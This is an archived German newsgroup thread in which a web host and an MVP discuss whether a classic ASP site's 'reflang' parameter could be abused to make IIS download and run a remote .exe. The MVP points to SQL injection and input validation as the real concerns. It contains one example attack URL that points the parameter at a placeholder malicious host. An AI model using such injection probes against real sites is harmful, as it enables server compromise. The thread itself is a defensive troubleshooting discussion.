Re: Fatal Error ownz you

Tech-Archive recommends: Repair Windows Errors & Optimize Windows Performance



Hallo,
jetzt hast du mich etwas durcheinander gebracht.


"Olaf Lüder [MVP]" <olnews@xxxxxxxxxx> schrieb im Newsbeitrag
news:665ec34397c3f6482672a840f8711032@xxxxxxxxxxxxx
> Hallo,
>
>> Was findest du von dieser URL?
>> http://www.trace-keeper.ch/default.asp?reflang=http://www.meineboeseseite.ch/meinboesescript.exe
>>
>> Den Original Link findest du unter 'Switch to English'.
>
> Hmmm, generell sollte das ja noch nicht direkt ein Problem darstellen - Du
> wirst den Weret des Parameters ja nicht als URL interpretieren, die Datei
> auf den Server laden und dann auch noch ausführen, oder?

Ich nicht, aber diejenige Person die attackiert hat. Nimm mal an, ich wäre
der Attackierer und führe oben genannten Link aus. Lädt der IIS die Datei
meinboesescript.exe auf den Server und führt dann die darin enthaltenen
funktionen aus? z.B. ein Remotekonsolenserver, welcher es dem Attackierer
erlaubt über den Port xxxx als Benutzer web000 (unter diesem Benutzer läuft
die Webseite) auf den Server zuzugreifen oder vielleicht ein kleines Script
welches automatisch die Rootverzeichnisse sucht und dann die index Seiten
erstellt?

>
>> Wenn es mit dem oben genannten Link möglich ist, so eine .exe Datei
>> auszuführen, welche dann die Dateien in das Verzeichniss schreibt, dann
>> hab ich wohl das Problem höchstwahrscheindlich gefunden.
>
> Ganz so einfach ist das nicht möglich; wenn Du mit dem ungeprüften Wert
> des Parameters aber z.B. eine SQL-String zusammensetzt und an eine
> SQL-Server-Datenbank schickst, wäre das (entsprechende DB-Rechte
> vorausgesetzt), prinzipiell schon möglich - etwas komplexer wäre der
> Parametr aber schon...

Das ist mir jetzt zu kompliziert um es zu verstehen. Vielleicht ist die
ganze Sache doch einiges komplizierter, als wie ich es mir vorstelle.
Vielleicht sollte ich doch warten, bis jemand anderes das Problem gefunden
hat. Schliesslich werden pro Tag einige Hundert Seiten von diesen Jungs
attackiert.

>
>> Kann man wie bei einem bekannten P*P Problem die Werte für reflang auf
>> eine bestimme Zeichenlänge minimieren (Z.B. das der Wert reflang nur
>> maximal 5 Zeichen lang sein darf?) oder sogar Systemweit, den Zugriff für
>> Variablen auf externe URLs unterbinden?
>
> Pauschal geht das unter (classic) ASP nicht; Du solltest generell allen
> Werten, die von außen kommen, mißtrauen und diese überprüfen - das mußt Du
> aber für jeden Wert einzeln machen.

Das wäre dann die Aufgabe des Webseitenbetreibers / Admin und nicht direkt
das Problem des Hosters.... Ich kann aber mal die Source anschauen und mal
gucken ob der Kunde die Variable limitiert hat. Aber wenn der IIS so oder
so, die URL dann nicht folgt und das File auch ausführt, sollte es ja keine
grosse Rollespielen

Grüsse

Christian


.



Relevant Pages

  • Kaputte Hyperlinks in Excel 2003 nach Datei speichern
    ... Sichern der Datei sind manche Hyperlinks defekt. ... dass es im Zusammenhang mit dem Server auf ... Hinterlege ich nun einen Link im Excel auf eine Datei in LW H klappt ...
    (microsoft.public.excel)
  • Kaputte Hyperlinks in Excel 2003 nach Datei speichern
    ... Sichern der Datei sind manche Hyperlinks defekt. ... dass es im Zusammenhang mit dem Server auf ... Hinterlege ich nun einen Link im Excel auf eine Datei in LW H klappt ...
    (microsoft.public.de.excel)
  • =?Utf-8?Q?Re:_Datei_=C3=B6ffnen?=
    ... lege (die doc liegt auf dem server) und dann das ganz vom server aus ... Liegt die doc im selben Ordner wie die HTML Datei, die den Link enthält? ... Damit ein Client eine Datei öffnen kann, muss er diese zunächst downloaden, ...
    (microsoft.public.de.german.entwickler.dotnet.vb)
  • WGET als Download-Managerwill oder darf nicht
    ... Führe ich das Script am Server selbst aus scheitert jeder Downloadver- ... URL wird vom ISA Server verweigert. ... Der direkte Download der Datei über den Browser (Link aus dem ...
    (microsoft.public.de.german.isaserver)
  • Re: Kaputte Hyperlinks in Excel 2003 nach Datei speichern
    ... > Sichern der Datei sind manche Hyperlinks defekt. ... > Dieser Server stellt auch ein Allgemeinlaufwerk zur Verfügung, ... > Nun wird der Link auch nicht mehr angezeigt, wenn man die Maus darüber bewegt. ...
    (microsoft.public.excel)